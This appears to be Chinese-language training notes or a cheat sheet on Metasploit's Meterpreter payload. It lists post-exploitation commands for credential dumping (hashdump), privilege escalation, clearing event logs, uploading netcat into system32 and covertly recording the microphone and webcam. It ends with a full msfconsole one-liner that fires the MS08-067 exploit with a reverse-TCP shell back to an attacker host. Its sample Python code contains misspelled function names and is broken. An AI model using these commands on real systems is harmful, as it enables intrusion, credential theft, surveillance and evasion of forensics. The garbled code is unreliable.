介绍
高级、动态、可扩展的 payload
- 基于 metepreter 上下文利用更多漏洞发起攻击
- 后渗透测试阶段一站式操作界面
完全基于内存的 DLL 注入式 payload (不写硬盘)
- 注入合法系统进程并建立 stager
- 基于 stager 上传和预加载 dll 进行扩展模块 TLS/1.0 通信隧道
- 利用 TLS 隧道进一步加载后续扩展模块(避免网络取证)
服务端使用 c 语言编写
客户端提供基于 ruby 的全特性 API(支持任何语言)
使用
Help̵background
Run̵bgrun
Cd ̵ls ̵cat ̵pwd ̵dir ̵mkdir ̵mv ̵rm ̵rmdir ̵edit
lpwd ̵lcd
clearev ̵download ̵
upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
execute -f cmd.exe -i –H
getuid ̵getsystem ̵getprivs ̵getproxy ̵getpid
Hashdump ̵run post/windows/gather/hashdump
▪ sysinfo ̵ps ̵kill ̵migrate ̵reboot ̵shutdown ̵shell
▪ show_mount ̵search -f autoexec.bat
▪ arp ̵netstat ̵ipconfig ̵ifconfig ̵route
▪ Idletime ̵resource
▪ record_mic ̵webcam_list ̵webcam_snap -i 1 -v false
扩展
load python
– Help
– python_execute “print (‘asdasdas’)”
– python_execute “import os; cd = os.getcwd()” -r cd
– python_import -f find.py
import os
for root,dirs,files in os.walk("c://"):
for file in files:
if file.endwith(".ini" ) and file.startwith("win"):
print(os.path.john(root,file))
Msfcli
msfconsole -x “use exploit/windows/smb/ms08_067_netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/ reverse_tcp; set LHOST 1.1.1.8; set LPORT 5555; set target 34; exploit”